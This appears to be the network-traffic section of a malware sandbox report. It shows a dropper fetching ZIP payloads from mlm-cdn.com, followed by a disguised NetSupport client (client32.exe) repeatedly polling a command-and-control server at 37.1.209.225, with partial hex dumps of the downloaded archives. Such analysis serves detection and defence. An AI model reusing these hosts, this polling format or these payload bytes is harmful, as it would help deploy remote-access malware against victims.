                                                      Sep 21, 2024 14:48:48.777656078 CEST1.1.1.1192.168.2.70x6edcName error (3)armayalitim1722.comnonenoneA (IP address)IN (0x0001)false
                                                      Sep 21, 2024 14:49:22.094172001 CEST1.1.1.1192.168.2.70x86b7Name error (3)armayalitim1722.comnonenoneA (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • mlm-cdn.com
                                                      • 37.1.209.225connection: keep-alivecmd=pollinfo=1ack=1
                                                      • geo.netsupportsoftware.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.74970437.1.209.2254437384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:45:39.583432913 CEST216OUTPOST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.749705172.67.68.212807384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:45:40.596533060 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                      Host: geo.netsupportsoftware.com
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Sep 21, 2024 14:45:41.241857052 CEST933INHTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:41 GMT
                                                      Content-Type: text/html; Charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      CF-Ray: 8c6a275b3aec4249-EWR
                                                      CF-Cache-Status: DYNAMIC
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: private
                                                      Set-Cookie: ASPSESSIONIDSSBTACBQ=OBMMKFKCAJDFNNMPEMKBIMDJ; path=/
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                      Vary: Accept-Encoding
                                                      cf-apo-via: origin,host
                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      X-Frame-Options: SAMEORIGIN
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ey%2BwzqINPOAVsMVzAdkyxkgC8tUn91QDBYNKiBhAJFx1hAgRcjGJZ7Isg%2BxXms5JO%2BzSch6PLRjQLVeEU0iUJpwHUaCElpVyo0seBm7IRMTXhYFDA5aahOPbHfa2E2DBqXqfwAlJGTwc9TBY"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1040.7357,-74.17240


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.76301637.1.209.2254437384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:46:34.955997944 CEST216OUTPOST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.76301737.1.209.2254437384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:47:08.284018040 CEST216OUTPOST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.76301837.1.209.2254437384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:47:42.637018919 CEST216OUTPOST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.76301937.1.209.2254437384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:48:15.550273895 CEST216OUTPOST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.76302037.1.209.2254437384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:48:48.769455910 CEST216OUTPOST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.76302137.1.209.2254437384C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 21, 2024 14:49:21.959918976 CEST216OUTPOST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                      Data Raw:
                                                      Data Ascii:


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749700142.11.212.1844434504C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-21 12:45:31 UTC49OUTGET /ssd/sdn1.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:31 UTC264INHTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:31 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:12 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 1541147
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip
                                                      2024-09-21 12:45:31 UTC7928INData Raw: 50 4b 03 04 14 00 00 00 08 00 82 2d d7 56 82 9c 8a a4 d1 00 00 00 06 01 00 00 07 00 00 00 4e 53 4d 2e 6c 69 63 2d 8f c1 4e c3 30 0c 86 ef 91 f2 0e 79 01 58 92 76 8c 82 72 82 c2 05 76 59 07 87 69 aa a2 cc 88 88 e0 44 4e 36 ba b7 a7 61 d8 a7 ef b7 e5 ff b7 d2 52 72 26 27 bd b2 b6 71 0d 67 9c dd 8b 35 94 cd 31 a5 48 45 bc 78 07 98 41 3c f9 00 d7 75 f6 0c 08 64 0b 1c 44 44 a1 96 77 6d 2b ae 84 ee 16 b2 59 68 a9 5a ce 2e bd db f5 f8 11 c9 c1 7e ff 87 e3 ff a1 99 5c c4 42 31 8c 11 c3 d9 cc e6 30 25 4f 67 c3 99 47 eb 8a 3f 41 15 c3 65 1d cc e3 c3 db 30 0c db 6d df bf eb 39 de b7 9d 72 b0 27 c8 46 c9 5a 9c c5 ac 8d e2 2c 51 3c 1c 5d 99 65 ce 32 90 b7 61 c4 68 d6 9b d7 db ee 66 d9 ad 66 f1 93 3c 7e 8d 3f 64 53 35 28 64 31 d7 17 2b fc 02 50 4b 03 04 14 00 00 00 08
                                                      Data Ascii: PK-VNSM.lic-N0yXvrvYiDN6aRr&'qg51HExA<udDDwm+YhZ.~\B10%OgG?Ae0m9r'FZ,Q<]e2ahff<~?dS5(d1+PK
                                                      2024-09-21 12:45:31 UTC8000INData Raw: b7 40 2a e8 cd 85 dc 4c 1b cf da b8 dc 58 6b 10 e2 0e c8 6f b4 2b 4a 58 19 57 1b 2c 4a cf 3e de 33 31 b1 76 23 2b 91 d8 e4 05 a6 6b 2a f1 5b 2a 6b e9 1f ca 19 bd 05 dc 1a 74 eb 80 cd 60 cd 3e 36 cf c7 a6 e0 b0 42 9d 86 00 8d 88 95 e7 d1 68 95 e7 c7 03 b8 ad 4b 79 41 3c a0 80 1b 40 a4 db cf 09 77 97 24 d6 0b 34 56 f3 b1 8b 4e a9 ee b4 92 dd 3b 26 27 0b 39 77 d6 03 cd 72 a7 36 6b 51 b1 26 3c 54 91 64 a7 64 97 c6 55 70 ac fa 5c 61 75 77 40 4f fb cb 28 d8 86 97 e7 21 25 0f 65 81 78 18 d0 ab b6 a0 33 f2 50 2c 5f 9e 2f f0 60 cd 44 74 46 3e 05 17 08 a1 21 4e ae 98 96 66 14 30 5f 9e aa 83 55 ed a6 8e 24 ec a6 d8 94 ad b4 1c 75 80 04 58 e1 8c de ab b8 00 9a 8e 0c a3 4e b3 a9 f9 71 8b 3e c7 69 e6 2a d0 ec f5 02 06 f8 27 e0 6e c7 31 d6 4a ca 9d 80 21 5a a1 77 55 00
                                                      Data Ascii: @*LXko+JXW,J>31v#+k*[*kt`>6BhKyA<@w$4VN;&'9wr6kQ&<TddUp\auw@O(!%ex3P,_/`DtF>!Nf0_U$uXNq>i*'n1J!ZwU
                                                      2024-09-21 12:45:31 UTC8000INData Raw: 2e 52 cc 91 33 48 93 0d cc f9 20 36 28 49 61 3c 2b 0e 73 0a 92 28 f3 aa 6f a2 ad 09 92 35 73 78 1c e6 69 0f 9f 9d 60 6e c0 7d e0 95 67 71 57 39 58 16 3e 7b 9d 39 82 37 99 b1 57 b0 24 3c 9b ce b7 7c c3 a8 c0 70 7a f9 7e af 66 44 14 2f e9 fd ef 25 6a 3f 0c 6b ef f2 c6 2b fd c5 44 a5 9d a8 41 37 6f 57 31 c1 17 6f c0 f5 24 49 51 aa 91 90 8a 6b da cd db 9b bd 4e b5 41 f1 fe 7d 3c 5e 10 2b 37 e2 5e c0 91 9c 9c 2c ad cc ab 74 d7 dc a4 ee 7a 45 e0 dd 35 d7 db 1f fa b8 04 f4 03 a4 84 3f e8 e6 f8 65 de 7d c0 e5 c6 ca c8 c7 2e e2 fe 84 29 81 cd fc 48 78 bc 27 3a bf 1b 07 d1 be f2 ec a5 0c b4 a1 0a 9f cd 0a 1d 60 8c 36 8b a2 13 20 5f 64 5f 70 b4 3c ac 0c 52 46 26 90 26 f1 6b 8b 39 e6 ee 35 c6 c2 da 9e 77 d7 8f 35 dc c6 72 df fd 6b d2 ce f2 a2 78 21 ae d5 42 56 10 3e
                                                      Data Ascii: .R3H 6(Ia<+s(o5sxi`n}gqW9X>{97W$<|pz~fD/%j?k+DA7oW1o$IQkNA}<^+7^,tzE5?e}.)Hx':`6 _d_p<RF&&k95w5rkx!BV>
                                                      2024-09-21 12:45:31 UTC8000INData Raw: 4f 34 37 90 5b 1d 72 b5 c2 66 07 bf d5 fc d0 85 c7 40 6c b3 9a 57 a1 cb 23 5a ba ae b9 44 0e 84 d0 21 dc 8c a0 79 7b e9 f0 e2 13 92 a7 0f 84 c9 70 af 18 ba 81 0d 57 88 d0 44 0e d5 7b cd db 74 65 61 79 39 fa 41 b6 b5 2e 43 87 09 ac f3 9e d0 d9 ae 29 78 e7 62 09 bb 86 a7 64 dc 97 48 a4 b9 fe 1a 6d 3f 6b f7 d0 70 ab 3e b2 0f ef 55 b1 39 c4 65 06 c9 21 56 84 ce b6 d4 89 22 2c 2b b6 6a b9 7e 48 82 9a 05 94 2a f9 5b c0 d0 b2 27 3a 39 26 da 9e 40 f2 57 e7 62 f6 3e e8 ae 39 6c f6 b2 a8 a7 cf 8d 85 67 3a 5d c5 fb d8 31 d9 f4 36 2a 10 7d 4b 49 e7 60 72 33 1f b7 bf 47 ef 24 ae 2a b7 d2 51 25 2f af a2 d9 c5 c7 52 5a 85 3b ac 5d 6a 99 ff 40 51 b9 b6 a0 4a a5 94 8e de 24 22 ed c1 17 b7 92 bd 85 df 6a 0b 2f 30 13 37 f3 75 02 27 e4 d9 bd 68 dc fa 04 f6 79 6c 15 d2 02 b2
                                                      Data Ascii: O47[rf@lW#ZD!y{pWD{teay9A.C)xbdHm?kp>U9e!V",+j~H*[':9&@Wb>9lg:]16*}KI`r3G$*Q%/RZ;]j@QJ$"j/07u'hyl
                                                      2024-09-21 12:45:31 UTC8000INData Raw: c5 d9 56 0a 39 7e 88 4e 81 28 c7 6a 2f 55 a1 06 d8 22 d1 0b 10 65 1f 00 eb 0a 52 09 23 e2 25 7c 0d d3 67 6a 05 8c 54 21 5e c3 0b 1a 8d 20 91 c3 bf 0c eb 91 6d a9 d1 1c 41 33 a8 ae 22 1e 9b 0d 89 e3 e5 5e 7a 34 43 60 99 29 c5 0a 54 aa 0e 0a 68 aa 05 3c ee 75 c9 f3 33 d5 8d 56 91 0e 5f cd 43 7b b9 0a ec 36 dc 9b 37 49 96 94 fd 63 0f ba 37 f8 28 72 68 c0 7d 58 1d a9 f7 61 d5 5b 0c bd b6 4b a9 f7 61 75 b8 b5 fb b0 6a 6b 92 ee c3 e2 c1 ca a5 78 30 51 37 44 db 64 0a f7 7e 0f a7 70 12 5a 8b a7 10 b8 f6 1e 6d fa 8f a5 e9 ff 97 ef 6b 04 ee c1 81 17 66 f1 b9 3f af 4d a0 59 89 c5 cd 63 6d 48 0a 78 d1 6d 55 6e ba ca cb 2d df 3a a4 3f 39 9b a7 cd e5 04 8b 3d 4f 7b 4d 9a cf f2 ce cf d2 f7 22 83 2c bf 7c 42 51 e2 57 0e 5d 87 27 fb ea 90 c1 62 9d ea 82 07 d5 9f c4 b9 d4
                                                      Data Ascii: V9~N(j/U"eR#%|gjT!^ mA3"^z4C`)Th<u3V_C{67Ic7(rh}Xa[Kaujkx0Q7Dd~pZmkf?MYcmHxmUn-:?9=O{M",|BQW]'b
                                                      2024-09-21 12:45:31 UTC8000INData Raw: b9 46 74 00 c0 3e 0e 5d c3 2a e9 80 89 fb 75 f4 47 51 25 7f ab 3d 2e 5f 42 2f bc 9f 50 31 71 6d 93 18 9b 21 62 47 a9 be 3f b8 3f 81 f0 94 65 74 e0 67 a2 77 57 c7 71 ba 4c d0 de e7 7c 35 b8 9a ee e8 90 7b cb 68 6d 3c e7 a2 10 f9 9b 28 3c b4 89 2b 2f 57 9c cc cd aa 3f 3c c0 ff 9a bc 89 ec 7a c5 68 05 29 15 47 4f 32 fe 09 81 86 86 33 e3 9f 8e c0 c3 8b 4e c8 57 dd fa 02 ff d9 9f fa c7 eb 83 f6 2f 3e 54 89 9e 83 b1 95 91 b3 85 e2 a3 1e 24 39 6e 5e 89 87 3e c1 0b df 96 62 0d ed a2 ad 2d 38 0e f0 20 a9 8e 3f bb 84 3d 1f ca 88 da c5 ae 4c 68 03 b4 87 e1 ed c2 43 99 d3 c4 f4 7c 67 47 bd c5 61 80 ff 6b 79 c7 8b 23 d1 c5 4d 69 4e 56 ac 9c fa 8a 3c 87 24 fb a3 09 d7 8b 42 c8 1a 18 ef 5f 5f 96 93 e5 df 99 07 94 eb eb d3 e8 4e 2f 95 98 7b 61 f5 f4 1b 46 d0 0d 5b 5b 73
                                                      Data Ascii: Ft>]*uGQ%=._B/P1qm!bG??etgwWqL|5{hm<(<+/W?<zh)GO23NW/>T$9n^>b-8 ?=LhC|gGaky#MiNV<$B__N/{aF[[s
                                                      2024-09-21 12:45:31 UTC8000INData Raw: df 43 54 9d 2f 4e 68 c3 bc fe 90 c0 b5 a8 a2 0f 77 69 51 81 7f bf f4 0b 47 05 8e b4 a7 22 f5 c7 52 c7 39 9d 70 c7 9e 48 d7 8f 79 35 94 92 5a 2e b7 1e 36 af 44 8f 91 c3 ab a7 d0 08 ac a3 e3 0a 1a 96 8a 02 bb 1f ff 22 11 95 17 2f 17 11 95 8f 1f 39 a7 85 28 3d be 66 cc 00 fd e2 96 ec fe 6b fd 22 f1 68 8f 5c 4c 3c da a7 17 93 7e b8 c2 88 29 d4 eb 8e 69 e1 de fb a0 db e5 c5 96 1a ba 9b 31 42 ab a8 1b ec 72 c1 89 6c fa b4 48 19 c6 9c ce 09 6d 2d f7 87 b6 96 b3 43 5b 1b 62 4b f2 00 5b f7 f5 e9 d9 f1 02 35 b3 2c 5d 33 3f 6e 11 c1 5b 59 98 13 5b d0 69 52 a2 d3 24 72 3a cd 94 86 fe 4e 33 61 71 26 b8 ec 8a fb 53 a9 4c a7 cd ee 31 5a 8c a8 21 83 cb 52 03 f8 7f 94 69 00 d2 e7 85 64 5f 60 24 fa 7f 3c a7 d5 93 2d 75 b2 b2 54 c9 87 6d 7c 65 69 99 58 79 4e 13 8c e6 bd 88
                                                      Data Ascii: CT/NhwiQG"R9pHy5Z.6D"/9(=fk"h\L<~)i1BrlHm-C[bK[5,]3?n[Y[iR$r:N3aq&SL1Z!Rid_`$<-uTm|eiXyN
                                                      2024-09-21 12:45:31 UTC8000INData Raw: 12 42 a1 28 4a 6f 01 06 52 8f ec 1c 03 5b 43 41 f5 34 10 d5 58 ec 1c fd d4 40 02 c4 0c bf 13 a2 2b c8 ef c2 63 63 10 14 a9 00 2f 00 a7 bc 45 f4 1a b4 b7 fe 2d 8d 76 d8 eb 75 ea 11 eb 4e 50 3d b1 11 ec 46 e0 0b 83 5c b2 5d 2e 6d da 39 9f cd 0a ca db 96 9b ef 4c f1 0f a9 dc e7 4b 5b 5e 6c b8 73 8a c1 9f 12 a8 33 06 1a 8c 6c 12 4e e5 d5 b5 c7 5e 51 17 68 51 83 75 c4 5e e9 8f 45 7e 5d 29 d9 e2 60 15 4d c4 8a ec 75 10 cd 6f 3e aa 73 15 07 f7 59 2b c5 18 d4 e5 15 a4 99 ac 02 69 e3 71 b6 ac 6e 3c 1c 23 40 88 92 51 ec 15 79 0d 9a 21 7d 04 f8 fe 89 5c 44 a2 c5 80 df 95 2c 50 c2 f2 66 8a 72 70 2e 46 2a 4c 07 c6 1e 27 40 23 65 5e 8f 26 ad 62 b7 f3 b5 ea 36 3b d5 8c 93 30 a2 9d 6e f9 5d 0c 79 98 61 4e 83 00 8a 0b 60 f0 5f 0f a4 0a a8 7f 83 8f e0 04 79 7b 25 ee 24 37
                                                      Data Ascii: B(JoR[CA4X@+cc/E-vuNP=F\].m9LK[^ls3lN^QhQu^E~])`Muo>sY+iqn<#@Qy!}\D,Pfrp.F*L'@#e^&b6;0n]yaN`_y{%$7
                                                      2024-09-21 12:45:31 UTC8000INData Raw: eb 19 a9 b0 7e dd 26 c5 52 eb c0 40 7e f4 da b6 8b 2a bf 86 30 cd 46 cb ac 70 ee 5a c8 3d c5 e4 71 28 6e 8b 93 9e a3 bd 32 f6 b3 9e 96 6e 0c db 73 f5 45 67 10 6b b4 13 42 28 f4 14 34 f9 32 bd aa 3c ce a6 61 2d b1 ca 40 ec 36 91 be 22 5f 8c 54 1c 89 b0 31 d5 f4 99 0e fe 90 3e bc d7 46 1f cf 49 11 f2 4e f0 10 55 89 72 a6 3c dd 24 4f 37 93 16 b8 5b 36 40 fc 6c 7b a7 5c d2 51 b0 db 3f 88 f4 a3 db 4e ec 9d 64 b4 37 9d 0e cf 09 a9 d0 e9 57 83 c1 2e 5f 36 b1 ca 29 54 bc 06 23 29 90 49 66 b9 c8 4c a6 5a c0 bd 90 c7 06 ee 85 40 89 6e 02 3b 5b cd ba 84 d4 6f 2e 68 7a 72 1e 19 50 f0 f1 c2 39 6c 7a ee 33 e7 fe 67 f7 45 23 ab 7c 6c ee 1e 86 21 c7 b2 33 e4 6e eb 0b 60 0f 9e fb 61 e1 ee b3 ec cd 53 d7 92 8f 3f fe 76 17 2b 7c 77 ee b9 82 b3 4f 9a f2 f6 b5 1b 63 3e 64 60
                                                      Data Ascii: ~&R@~*0FpZ=q(n2nsEgkB(42<a-@6"_T1>FINUr<$O7[6@l{\Q?Nd7W._6)T#)IfLZ@n;[o.hzrP9lz3gE#|l!3n`aS?v+|wOc>d`
                                                      2024-09-21 12:45:31 UTC8000INData Raw: 96 97 ab 7c e0 1f 08 b3 d3 0a 93 c8 23 64 e4 59 b7 62 2e b6 82 94 65 c0 82 bd 9f 8c ca f2 36 72 8f 8d b0 29 53 16 df 0d d6 88 e3 27 32 f6 60 df 3c 79 25 e6 85 9b 17 76 54 9b 9d e0 c9 f2 20 1d fe 25 de 10 86 7c 57 be 3c d6 98 fa 07 f6 39 cb 3e a6 bb 8c a9 6b d9 0a 12 0c c6 90 f7 49 8e af 2c 47 22 f4 77 5b 2e 6f cf f9 1d 59 22 79 51 e3 2b af ce 35 4f c6 ee 71 37 93 64 aa cd 3b 95 de fb 7e 8c 20 82 6e 19 dd fc 35 6a 1a 83 ce 95 4b 8b a1 96 43 af a0 5c 94 1c cc 52 c3 4e 16 eb 7c 56 5c bc 20 52 7e 9f 2d 49 10 29 7b 73 74 19 72 91 8f fe e3 9b e8 52 06 bd d4 6a ad 54 a5 56 4a 2e 5a 14 78 ce 24 f8 a7 83 22 c4 58 d4 2c 29 54 d0 10 ce 21 d5 68 b1 78 a7 98 59 5a 10 c2 7a f3 58 09 20 1c 06 6f f3 9b d1 d3 24 e4 75 62 ba 88 42 63 45 c9 8e 2c ed d2 69 92 fe 48 a2 a9 0d
                                                      Data Ascii: |#dYb.e6r)S'2`<y%vT %|W<9>kI,G"w[.oY"yQ+5Oq7d;~ n5jKC\RN|V\ R~-I){strRjTVJ.Zx$"X,)T!hxYZzX o$ubBcE,iH


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.749701142.11.212.1844434504C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-21 12:45:35 UTC49OUTGET /ssd/sdn2.zip HTTP/1.1
                                                      Host: mlm-cdn.com
                                                      2024-09-21 12:45:36 UTC263INHTTP/1.1 200 OK
                                                      Date: Sat, 21 Sep 2024 12:45:36 GMT
                                                      Server: Apache
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Last-Modified: Sat, 10 Aug 2024 18:46:12 GMT
                                                      Accept-Ranges: bytes
                                                      Content-Length: 227999
                                                      Vary: Accept-Encoding
                                                      Content-Type: application/zip
                                                      2024-09-21 12:45:36 UTC7929INData Raw: 50 4b 03 04 14 00 00 00 08 00 fc 43 f7 52 4a 93 09 5d da 28 00 00 90 49 00 00 18 00 00 00 6d 73 76 63 70 31 34 30 5f 63 6f 64 65 63 76 74 5f 69 64 73 2e 64 6c 6c ed 7a 07 5c 53 c9 f6 f0 4d a3 97 20 a0 a8 94 48 11 54 ca 4d 90 2e 9d a0 88 48 07 41 10 43 08 24 08 04 93 1b 9a a2 f4 05 91 15 2b d8 c1 de 56 c4 b6 36 24 8a 88 58 51 57 65 d5 55 c4 16 15 15 15 15 15 cd 37 73 13 14 75 7d fb de f7 7f ef 7b ef 7b bf ff e5 37 e5 9c 39 73 e6 cc 99 39 e7 cc 4c 08 88 ae 44 48 08 82 90 41 92 4a 11 e4 00 22 fb 3c 90 bf fe ba 41 d2 30 3a a4 81 ec 55 3e 37 e2 00 61 d2 b9 11 61 5c 9e 90 96 2e e0 27 09 58 a9 34 36 2b 2d 8d 8f d1 e2 39 34 81 28 8d c6 4b a3 f9 04 86 d2 52 f9 09 1c 6b 75 75 15 53 39 8f 3b a9 a9 53 37 aa 91 94 fa 53 c6 1c a2 f2 66 50 ee c0 2a 95 36 e3 38 a2 d2 21
                                                      Data Ascii: PKCRJ](Imsvcp140_codecvt_ids.dllz\SM HTM.HAC$+V6$XQWeU7su}{{79s9LDHAJ"<A0:U>7aa\.'X46+-94(KRkuuS9;S7SfP*68!
                                                      2024-09-21 12:45:36 UTC8000INData Raw: 8b 39 66 cd e9 aa 2f 66 6e 63 73 8f b1 cf 67 0c ea 7e 54 b2 f7 25 51 61 fa 6f 0b 15 e3 ae eb 69 33 50 70 aa 73 60 d8 a2 f6 74 3b d4 d1 da d1 89 11 8d 92 f3 88 84 9e 9a fc f6 0d f9 57 d0 fc 4b ff 12 9b b1 42 c7 c8 2e 95 a6 5f da fd 04 9c 14 56 5a c2 c0 cb e5 24 5e 2a 0f e3 24 d0 47 a2 a6 32 72 83 30 2e 2b 85 23 a4 85 85 86 d2 98 a1 93 9d 7d c0 a9 d4 6a ac 97 af 8f 15 93 e9 e5 49 37 43 4d 64 a6 a8 ff 85 2d fc 71 cd 2a 14 63 a5 a6 d3 42 39 82 0c 1e 9b 53 53 a0 11 80 16 90 df a1 05 a4 3b 03 9e 66 3c eb e6 86 54 c5 bc bc c9 c4 0d d3 f3 db 03 fa ec 7f 89 22 e4 33 23 69 1b fc a9 c4 72 d7 81 ca 1f 66 50 ba 1d dd 81 e1 c8 c0 1f 66 a0 4b 61 c8 c1 ff ca 75 fa cb 77 9f 97 a3 cf 6c 69 38 22 da 3a 67 dc d2 91 41 8b 77 35 94 49 77 75 14 9d 53 fb fd b4 7b 56 6c 7d e0 3e
                                                      Data Ascii: 9f/fncsg~T%Qaoi3Pps`t;WKB._VZ$^*$G2r0.+#}jI7CMd-q*cB9SS;f<T"3#irfPfKauwli8":gAw5IwuS{Vl}>
                                                      2024-09-21 12:45:36 UTC8000INData Raw: 84 1e ad 04 62 8a d9 13 58 7f 3e c8 2a e1 4d e0 fe 23 1d fe c1 f2 22 09 30 40 65 a8 7a 6a 62 de 74 ae 31 32 38 b2 d6 38 45 b8 2f 4d bf 63 85 c6 ba c4 c0 75 49 0e b9 af 28 c4 9b 6f 9b 27 5b 73 c2 c5 65 b7 2b f1 33 f3 b7 b4 aa 52 15 27 22 52 c7 8f 1f a6 2b 7b 69 97 fd a8 d9 f3 c8 01 99 0d 71 75 7c 16 85 cf 91 a5 52 6d 7a 9c 40 ed fe 29 fc 2e 89 6a 0a 77 27 cf 30 83 03 83 39 62 37 da a7 13 d7 c7 60 a5 92 1a 47 6f e6 dc 1b ca d8 d7 c5 7b b5 73 a2 3e e3 dd 1d a1 07 9e e1 3e 03 86 7a 29 5a 7e d7 60 87 e4 eb f7 25 b1 be 1c 99 2e 98 e7 53 e0 7b d3 18 f4 e0 a5 bf e5 eb a7 e6 77 e0 05 5a 73 2d eb 16 ad d4 fd 6e 8d 28 df 89 b1 88 15 3e 44 af 57 bc d9 30 83 bb bd 82 5e 4b f6 42 ef 46 6e 64 46 b5 fd 29 d5 41 96 f1 8b a7 d3 2a 82 a4 50 7b a7 0b b2 75 0b b1 a1 49 cf 02
                                                      Data Ascii: bX>*M#"0@ezjbt1288E/McuI(o'[se+3R'"R+{iqu|Rmz@).jw'09b7`Go{s>>z)Z~`%.S{wZs-n(>DW0^KBFndF)A*P{uI
                                                      2024-09-21 12:45:36 UTC8000INData Raw: 3a 73 15 b7 4e 26 a7 d0 30 9c 7d 00 9d 57 ab 10 c8 02 f9 a2 bc 68 6c 0a 31 74 7a e6 5b 77 ec 17 57 f3 ab 45 79 41 10 b8 af 00 47 f2 99 29 f4 cb c7 eb 35 bd 60 d9 0f 09 77 42 42 98 26 28 6a a0 11 f3 b1 81 68 f5 75 c3 8c 94 a6 5e d2 96 0e 4a f1 63 fb 89 92 71 c0 fc b4 71 29 e1 b4 1f f6 0c c3 95 fa a0 4c ae 28 ff 0e 24 ab 37 c3 de c9 11 e5 ff 82 bb 3f 36 cc 7e 37 53 17 0c e4 af 3d 78 03 f7 b8 04 6b 8b 89 2d 5c 7b ec 06 ee d7 c1 9c 43 d3 60 36 d7 36 99 0e 09 b4 4d d6 0a 15 db 20 58 ae 67 48 8c 1f 32 c1 5c 9b c2 10 07 c7 82 02 af f3 18 51 cb 46 60 8f 98 0b 02 cb 01 25 4c 41 81 fc 02 c6 fd 61 20 bd b6 09 ed f6 a4 37 37 21 3e 19 b1 d1 76 c5 b0 70 c3 15 53 8f e6 62 d7 92 00 b2 6e 52 ec ce fa de 9a 06 83 5a 9c fb 92 4d 15 ce f4 c7 54 cc 1d 4b d3 54 4b cf d7 24 d5
                                                      Data Ascii: :sN&0}Whl1tz[wWEyAG)5`wBB&(jhu^Jcqq)L($7?6~7S=xk-\{C`66M XgH2\QF`%LAa 77!>vpSbnRZMTKTK$
